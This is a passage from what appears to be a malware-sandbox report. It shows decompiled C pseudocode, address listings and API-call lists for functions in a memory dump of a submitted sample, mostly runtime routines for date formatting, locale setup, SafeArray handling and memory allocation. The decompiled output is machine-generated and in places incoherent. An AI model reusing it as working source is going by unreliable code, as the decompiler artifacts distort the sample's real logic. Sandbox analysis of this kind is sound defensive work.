											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
										}
										goto L109;
									case 2:
										L15:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x24;
										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
										__eax =  *(__ebp - 0x24);
										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
										goto L109;
									case 3:
										L16:
										E00408974(__ebp) = E004089A0(__ebp);
										__eax =  *(__ebp + 8);
										__edx = __ebp - 0x28;
										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
										__eax =  *(__ebp - 0x28);
										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
										goto L109;
									case 4:
										L17:
										E00408974(__ebp) = E004089A0(__ebp);
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
										if(__eflags < 0) {
											__eax =  *(__ebp + 8);
											__eax =  *(__ebp - 0x10) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax = 0x45469c[ *(__ebp - 0x10) & 0x0000ffff];
												__eax = E00408908(0x45469c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
											} else {
												 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
												__eax =  *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546cc + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											}
										}
										goto L109;
									case 5:
										L23:
										E00408974(__ebp) =  *(__ebp - 0xc);
										__eax =  *(__ebp - 0xc) - 1;
										__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
										__eflags = __eax;
										if(__eflags < 0) {
											E004089A0(__ebp) =  *(__ebp + 8);
											__eax =  *(__ebp - 0x12) & 0x0000ffff;
											__edx =  *(__ebp - 0xc);
											__eax = E00408928( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										} else {
											if(__eflags == 0) {
												E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
												__eax =  *(0x4546fc + (__ax & 0x0000ffff) * 4);
												__eax = E00408908( *(0x4546fc + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
											} else {
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eflags == 0) {
													E00408888(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
													__eax =  *(0x454718 + (__ax & 0x0000ffff) * 4);
													__eax = E00408908( *(0x454718 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
												} else {
													__eax = __eax - 1;
													__eflags = __eax;
													if(__eax == 0) {
														__eax =  *(__ebp + 8);
														__eax =  *0x454684; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													} else {
														__eax =  *(__ebp + 8);
														__eax =  *0x454688; // 0x0
														__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
													}
												}
											}
										}
										goto L109;
									case 6:
										L33:
										__eax = E00408974(__ebp);
										__eax = E004089D8(__ebp);
										 *(__ebp - 0x1f) = 0;
										__esi =  *(__ebp - 4);
										while(1) {
											L52:
											__al =  *__esi;
											__eflags =  *__esi;
											if( *__esi == 0) {
												break;
											}
											L34:
											__eax = __eax & 0x000000ff;
											__eflags = __eax;
											asm("bt [0x419108], eax");
											if(__eax >= 0) {
												L36:
												__eax = 0;
												__al =  *__esi;
												__eflags = 0 - 0x48;
												if(0 > 0x48) {
													L42:
													__eax = 0xffffffffffffff9f;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														L45:
														__eflags =  *(__ebp - 0x1f);
														if( *(__ebp - 0x1f) != 0) {
															L51:
															__esi = __esi + 1;
															__eflags = __esi;
															continue;
														}
														L46:
														__edx = 0x409418;
														__ecx = 5;
														__eax = __esi;
														__eax = E004077C0(__esi, 5, 0x409418);
														__eflags = __eax;
														if(__eax == 0) {
															L49:
															 *((char*)(__ebp - 0x1e)) = 1;
															break;
														}
														L47:
														__edx = 0x409420;
														__ecx = 3;
														__eax = __esi;
														__eax = E004077C0(__esi, 3, 0x409420);
														__eflags = __eax;
														if(__eax == 0) {
															goto L49;
														}
														L48:
														__edx = 0x409424;
														__ecx = 4;
														__eax = __esi;
														__eax = E004077C0(__esi, 4, 0x409424);
														__eflags = __eax;
														if(__eax != 0) {
															break;
														}
														goto L49;
													}
													L43:
													__eax = 0xffffffffffffff98;
													__eflags = 0xffffffffffffff9f;
													if(0xffffffffffffff9f == 0) {
														break;
													}
													L44:
													goto L51;
												}
												L37:
												if(0 == 0x48) {
													break;
												}
												L38:
												__eax = 0xffffffffffffffde;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													L50:
													__al =  *(__ebp - 0x1f);
													__al =  *(__ebp - 0x1f) ^ 0x00000001;
													__eflags = __al;
													 *(__ebp - 0x1f) = __al;
													goto L51;
												}
												L39:
												__eax = 0xffffffffffffffd9;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L50;
												}
												L40:
												__eax = 0xffffffffffffffbf;
												__eflags = 0xffffffffffffffde;
												if(0xffffffffffffffde == 0) {
													goto L45;
												}
												L41:
												goto L51;
											} else {
												__eax = __esi;
												__eax = E0040B044(__esi);
												__esi = __eax;
												continue;
											}
										}
										L53:
										__ax =  *((intOrPtr*)(__ebp - 0x16));
										__eflags =  *((char*)(__ebp - 0x1e));
										if( *((char*)(__ebp - 0x1e)) != 0) {
											__eflags = __ax;
											if(__ax != 0) {
												__eflags = __ax - 0xc;
												if(__ax > 0xc) {
													__ax = __ax - 0xc;
													__eflags = __ax;
												}
											} else {
												__ax = 0xc;
											}
										}
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__edx =  *(__ebp + 8);
										__eax = __ax & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 7:
										L61:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x18) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 8:
										L64:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 2;
										if( *(__ebp - 0xc) > 2) {
											 *(__ebp - 0xc) = 2;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1a) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 9:
										L67:
										__eax = E00408974(__ebp);
										__eflags =  *(__ebp - 0xc) - 1;
										if( *(__ebp - 0xc) != 1) {
											__eax =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										} else {
											__eax =  *(__ebp + 8);
											__eax =  *0x454698; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										}
										goto L109;
									case 0xa:
										L70:
										E00408974(__ebp) = E004089D8(__ebp);
										__eflags =  *(__ebp - 0xc) - 3;
										if( *(__ebp - 0xc) > 3) {
											 *(__ebp - 0xc) = 3;
										}
										__eax =  *(__ebp + 8);
										__eax =  *(__ebp - 0x1c) & 0x0000ffff;
										__edx =  *(__ebp - 0xc);
										__eax = E00408928( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
										goto L109;
									case 0xb:
										goto L0;
									case 0xc:
										L90:
										E00408974(__ebp) =  *(__ebp + 8);
										__eax =  *0x454684; // 0x0
										__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
										__eax = E004089D8(__ebp);
										__eflags =  *((short*)(__ebp - 0x16));
										if( *((short*)(__ebp - 0x16)) != 0) {
											L93:
											 *(__ebp + 8) = 0x409438;
											__edx = 1;
											E004088C4(1,  *(__ebp + 8)) =  *(__ebp + 8);
											__eax =  *0x45469c; // 0x0
											__eax = E00408C88(__eax, __ebx, __edi, __esi,  *(__ebp + 8));
											goto L109;
										}
										L91:
										__eflags =  *(__ebp - 0x18);
										if( *(__ebp - 0x18) != 0) {
											goto L93;
										}
										L92:
										__eflags =  *(__ebp - 0x1a);
										if( *(__ebp - 0x1a) == 0) {
											goto L109;
										}
										goto L93;
									case 0xd:
										L94:
										__eflags =  *0x454681;
										__eflags = __eax - 0x454681;
										 *__edi =  *__edi + __cl;
										__eflags =  *(__ecx - 0x75000000) & __bl;
									case 0xe:
										L97:
										__eflags =  *0x45468c;
										__eflags = __eax - 0x45468c;
										_t136 = __edi + __esi * 2 - 0x75;
										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
										__eflags =  *_t136;
									case 0xf:
										L100:
										__esi =  *(__ebp - 4);
										while(1) {
											L104:
											__eax =  *(__ebp - 4);
											__al =  *__eax;
											__eflags = __al;
											if(__al == 0) {
												break;
											}
											L105:
											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
												L101:
												__eax = __eax & 0x000000ff;
												__eflags = __eax;
												asm("bt [0x419108], eax");
												if(__eax >= 0) {
													_t146 = __ebp - 4;
													 *_t146 =  *(__ebp - 4) + 1;
													__eflags =  *_t146;
												} else {
													__eax =  *(__ebp - 4);
													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
												}
												continue;
											}
											break;
										}
										L106:
										__eax =  *(__ebp + 8);
										__edx =  *(__ebp - 4);
										__edx =  *(__ebp - 4) - __esi;
										__esi = E004088C4(__edx,  *(__ebp + 8));
										__eax =  *(__ebp - 4);
										__eflags =  *__eax;
										if( *__eax != 0) {
											 *(__ebp - 4) =  *(__ebp - 4) + 1;
										}
										goto L109;
								}
							} else {
								__eflags = _t181 - 0x4d;
								if(_t181 == 0x4d) {
									__eflags = _t232 - 0x48;
									if(_t232 == 0x48) {
										_t181 = 0x4e;
									}
								}
								L9:
								_t232 = _t181;
								goto L10;
							}
						} else {
							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t232 = 0x20;
							continue;
						}
					}
					L110:
					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
					_pop(_t272);
					 *[fs:eax] = _t272;
					_push(E00409410);
					return E00403EAC(_t282 - 0x28, 2);
				}
			}

















    0x00409161
    0x00409161
    0x00409161
    0x00409162
    0x0040916b
    0x0040917f
    0x004091b5
    0x004091ba
    0x004091bc
    0x004091f2
    0x004091f7
    0x004091f9
    0x0040923b
    0x00409240
    0x00409242
    0x00409282
    0x00409287
    0x00409289
    0x004092c9
    0x0040928b
    0x0040928c
    0x00409291
    0x004092ae
    0x004092b4
    0x004092b4
    0x00409244
    0x00409245
    0x0040924a
    0x00409267
    0x0040926d
    0x0040926d
    0x004091fb
    0x004091fb
    0x00409200
    0x00409217
    0x0040921c
    0x00409202
    0x00409206
    0x0040920b
    0x00409210
    0x00409222
    0x00409226
    0x00409226
    0x004091be
    0x004091be
    0x004091c3
    0x004091c5
    0x004091c5
    0x004091d3
    0x004091d9
    0x004091dd
    0x004091dd
    0x00409181
    0x00409181
    0x00409186
    0x00409188
    0x00409188
    0x00409188
    0x0040918b
    0x0040918f
    0x00409194
    0x00409196
    0x0040919c
    0x004091a0
    0x004091a0
    0x004093d8
    0x004093d8
    0x004093db
    0x004093df
    0x00000000
    0x00000000
    0x00408cdf
    0x00408cdf
    0x00408cea
    0x00408cf1
    0x00408d24
    0x00408d27
    0x00408d2f
    0x00408d32
    0x00408d34
    0x00408d34
    0x00408d34
    0x00408d36
    0x00408d3b
    0x00408d3e
    0x00408d4d
    0x00408d52
    0x00408d55
    0x00408d58
    0x004093c6
    0x004093d2
    0x00000000
    0x004093d7
    0x00408d5e
    0x00408d64
    0x00000000
    0x00000000
    0x00000000
    0x00408de4
    0x00408de5
    0x00408dec
    0x00408df2
    0x00408df6
    0x00408e28
    0x00408df8
    0x00408e10
    0x00408e15
    0x00000000
    0x00000000
    0x00408e33
    0x00408e3b
    0x00408e41
    0x00408e46
    0x00408e4c
    0x00408e52
    0x00408e55
    0x00000000
    0x00000000
    0x00408e60
    0x00408e68
    0x00408e6e
    0x00408e73
    0x00408e79
    0x00408e7f
    0x00408e82
    0x00000000
    0x00000000
    0x00408e8d
    0x00408e95
    0x00408e9e
    0x00408e9f
    0x00408e9f
    0x00408ea2
    0x00408ea8
    0x00408eac
    0x00408eb0
    0x00408eb3
    0x00408ea4
    0x00408ea4
    0x00408ec2
    0x00408ec6
    0x00408ecd
    0x00408ea6
    0x00408edc
    0x00408ee0
    0x00408ee7
    0x00408eec
    0x00408ea4
    0x00000000
    0x00000000
    0x00408ef2
    0x00408ef9
    0x00408efc
    0x00408efd
    0x00408efd
    0x00408f00
    0x00408f13
    0x00408f17
    0x00408f1b
    0x00408f1e
    0x00408f02
    0x00408f02
    0x00408f3b
    0x00408f3e
    0x00408f45
    0x00408f04
    0x00408f04
    0x00408f04
    0x00408f05
    0x00408f62
    0x00408f65
    0x00408f6c
    0x00408f07
    0x00408f07
    0x00408f07
    0x00408f08
    0x00408f77
    0x00408f7b
    0x00408f80
    0x00408f0a
    0x00408f8b
    0x00408f8f
    0x00408f94
    0x00408f99
    0x00408f08
    0x00408f05
    0x00408f02
    0x00000000
    0x00000000
    0x00408f9f
    0x00408fa0
    0x00408fa7
    0x00408fad
    0x00408fb1
    0x0040904e
    0x0040904e
    0x0040904e
    0x00409050
    0x00409052
    0x00000000
    0x00000000
    0x00408fb9
    0x00408fb9
    0x00408fb9
    0x00408fbe
    0x00408fc5
    0x00408fd2
    0x00408fd2
    0x00408fd4
    0x00408fd6
    0x00408fd9
    0x00408fee
    0x00408fee
    0x00408fee
    0x00408ff1
    0x00408ffa
    0x00408ffa
    0x00408ffe
    0x0040904d
    0x0040904d
    0x0040904d
    0x00000000
    0x0040904d
    0x00409000
    0x00409000
    0x00409005
    0x0040900a
    0x0040900c
    0x00409011
    0x00409013
    0x0040903f
    0x0040903f
    0x00000000
    0x0040903f
    0x00409015
    0x00409015
    0x0040901a
    0x0040901f
    0x00409021
    0x00409026
    0x00409028
    0x00000000
    0x00000000
    0x0040902a
    0x0040902a
    0x0040902f
    0x00409034
    0x00409036
    0x0040903b
    0x0040903d
    0x00000000
    0x00000000
    0x00000000
    0x0040903d
    0x00408ff3
    0x00408ff3
    0x00408ff3
    0x00408ff6
    0x00000000
    0x00000000
    0x00408ff8
    0x00000000
    0x00408ff8
    0x00408fdb
    0x00408fdb
    0x00000000
    0x00000000
    0x00408fdd
    0x00408fdd
    0x00408fdd
    0x00408fe0
    0x00409045
    0x00409045
    0x00409048
    0x00409048
    0x0040904a
    0x00000000
    0x0040904a
    0x00408fe2
    0x00408fe2
    0x00408fe2
    0x00408fe5
    0x00000000
    0x00000000
    0x00408fe7
    0x00408fe7
    0x00408fe7
    0x00408fea
    0x00000000
    0x00000000
    0x00408fec
    0x00000000
    0x00408fc7
    0x00408fc7
    0x00408fc9
    0x00408fce
    0x00000000
    0x00408fce
    0x00408fc5
    0x00409058
    0x00409058
    0x0040905c
    0x00409060
    0x00409062
    0x00409065
    0x0040906d
    0x00409071
    0x00409073
    0x00409073
    0x00409073
    0x00409067
    0x00409067
    0x00409067
    0x00409065
    0x00409077
    0x0040907b
    0x0040907d
    0x0040907d
    0x00409084
    0x00409088
    0x0040908b
    0x0040908e
    0x00000000
    0x00000000
    0x00409099
    0x004090a1
    0x004090a7
    0x004090ab
    0x004090ad
    0x004090ad
    0x004090b4
    0x004090b8
    0x004090bc
    0x004090bf
    0x00000000
    0x00000000
    0x004090ca
    0x004090d2
    0x004090d8
    0x004090dc
    0x004090de
    0x004090de
    0x004090e5
    0x004090e9
    0x004090ed
    0x004090f0
    0x00000000
    0x00000000
    0x004090fb
    0x004090fc
    0x00409102
    0x00409106
    0x0040911c
    0x00409120
    0x00409125
    0x00409108
    0x00409108
    0x0040910c
    0x00409111
    0x00409116
    0x00000000
    0x00000000
    0x00409130
    0x00409138
    0x0040913e
    0x00409142
    0x00409144
    0x00409144
    0x0040914b
    0x0040914f
    0x00409153
    0x00409156
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004092d4
    0x004092db
    0x004092df
    0x004092e4
    0x004092eb
    0x004092f1
    0x004092f6
    0x0040930a
    0x0040930e
    0x00409313
    0x0040931e
    0x00409322
    0x00409327
    0x00000000
    0x0040932c
    0x004092f8
    0x004092f8
    0x004092fd
    0x00000000
    0x00000000
    0x004092ff
    0x004092ff
    0x00409304
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00409332
    0x00409332
    0x00409333
    0x00409338
    0x0040933a
    0x00000000
    0x00409358
    0x00409358
    0x00409359
    0x0040935e
    0x0040935e
    0x0040935e
    0x00000000
    0x00409377
    0x00409377
    0x0040939a
    0x0040939a
    0x0040939a
    0x0040939d
    0x0040939f
    0x004093a1
    0x00000000
    0x00000000
    0x004093a3
    0x004093a3
    0x004093a6
    0x0040937c
    0x0040937c
    0x0040937c
    0x00409381
    0x00409388
    0x00409397
    0x00409397
    0x00409397
    0x0040938a
    0x0040938a
    0x00409392
    0x00409392
    0x00000000
    0x00409388
    0x00000000
    0x004093a6
    0x004093a8
    0x004093a8
    0x004093ac
    0x004093af
    0x004093b3
    0x004093b9
    0x004093bc
    0x004093bf
    0x004093c1
    0x004093c1
    0x00000000
    0x00000000
    0x00408d40
    0x00408d40
    0x00408d42
    0x00408d44
    0x00408d47
    0x00408d49
    0x00408d49
    0x00408d47
    0x00408d4b
    0x00408d4b
    0x00000000
    0x00408d4b
    0x00408cf3
    0x00408d04
    0x00408d12
    0x00408d15
    0x00000000
    0x00408d15
    0x00408cf1
    0x004093e5
    0x004093e8
    0x004093f0
    0x004093f3
    0x004093f6
    0x00409408
    0x00409408

    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040D920, Relevance: 6.1, APIs: 4, Instructions: 115
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0040C9FC();
							E0040D7EC(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0040CA04();
							E0040D7EC(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0040D8C4(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0040D894(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0040CA0C();
						E0040D7EC(_v780);
						E0040DB18(_v792);
					}
				}
				L15:
				_push(_v776);
				L0040C598();
				return E0040D7EC(_v776);
			}






















    0x0040d92c
    0x0040d93c
    0x0040d943
    0x0040d943
    0x0040d94e
    0x0040d95c
    0x0040d96b
    0x0040d989
    0x0040d96d
    0x0040d978
    0x0040d978
    0x0040d998
    0x0040d9a4
    0x0040d9a7
    0x0040d9a9
    0x0040d9aa
    0x0040d9ac
    0x0040d9b2
    0x0040d9b4
    0x0040d9c3
    0x0040d9c4
    0x0040d9ce
    0x0040d9cf
    0x0040d9d4
    0x0040d9df
    0x0040d9e0
    0x0040d9ea
    0x0040d9eb
    0x0040d9f0
    0x0040da0b
    0x0040da0d
    0x0040da0e
    0x0040da11
    0x0040da11
    0x0040d9b2
    0x0040da1a
    0x0040da1d
    0x0040da1f
    0x0040da20
    0x0040da26
    0x0040da2c
    0x0040da2e
    0x0040da30
    0x0040da33
    0x0040da36
    0x0040da36
    0x0040da39
    0x00000000
    0x00000000
    0x00000000
    0x0040da39
    0x0040da39
    0x0040da40
    0x0040da4b
    0x0040da53
    0x0040da5a
    0x0040da61
    0x0040da62
    0x0040da67
    0x0040da72
    0x0040da72
    0x0040da80
    0x0040da84
    0x0040da8a
    0x0040da8b
    0x0040da9b

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040B3A0, Relevance: 6.1, APIs: 4, Instructions: 95
    C-Code - Quality: 100%
    			E0040B3A0() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x454738 = 0x409;
				 *0x45473c = 9;
				 *0x454740 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x454738 = _t14;
				}
				if(_t14 != 0) {
					 *0x45473c = _t14 & 0x3ff;
					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x419108, 0x40b4f4, 8 << 2);
				if( *0x4190c0 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x454744 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040B328(__eflags, _t49);
					}
				} else {
					_t20 = E0040B388();
					if(_t20 != 0) {
						 *0x454745 = 0;
						 *0x454744 = 0;
						return _t20;
					}
					E0040B328(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x454744 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x454745 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x454738; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x454745 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















    0x0040b3ac
    0x0040b3b6
    0x0040b3c0
    0x0040b3ca
    0x0040b3d1
    0x0040b3d3
    0x0040b3d3
    0x0040b3db
    0x0040b3e7
    0x0040b3f3
    0x0040b3f3
    0x0040b407
    0x0040b410
    0x0040b4bf
    0x0040b4c4
    0x0040b4c9
    0x0040b4d0
    0x0040b4d5
    0x0040b4d7
    0x0040b4da
    0x0040b4e0
    0x0040b4e2
    0x00000000
    0x0040b4ea
    0x0040b416
    0x0040b416
    0x0040b41d
    0x0040b41f
    0x0040b426
    0x00000000
    0x0040b426
    0x0040b433
    0x0040b443
    0x0040b445
    0x0040b44a
    0x0040b44d
    0x0040b453
    0x0040b455
    0x0040b457
    0x00000000
    0x0040b457
    0x0040b463
    0x0040b468
    0x0040b46e
    0x0040b46e
    0x0040b470
    0x0040b471
    0x0040b472
    0x0040b472
    0x0040b48e
    0x0040b494
    0x0040b499
    0x0040b49e
    0x0040b4a4
    0x0040b4a4
    0x0040b4a8
    0x0040b4ab
    0x0040b4b1
    0x0040b4b3
    0x00000000
    0x00000000
    0x0040b4b5
    0x0040b4b8
    0x0040b4b8
    0x0040b4b9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040b4b9
    0x0040b4a4
    0x0040b4f1
    0x0040b4f1
    0x00000000

    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040152C, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E0040137C(0x4545e4, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









    0x00401530
    0x00401532
    0x00401534
    0x00401536
    0x0040154a
    0x0040154f
    0x00401551
    0x00401555
    0x0040155d
    0x00401563
    0x0040156f
    0x00401574
    0x00401574
    0x00401579
    0x00401582
    0x00401589
    0x00401595
    0x0040159c
    0x00000000
    0x0040159c
    0x00401589
    0x004015a2

    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00405E00, Relevance: 6.0, APIs: 4, Instructions: 11
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
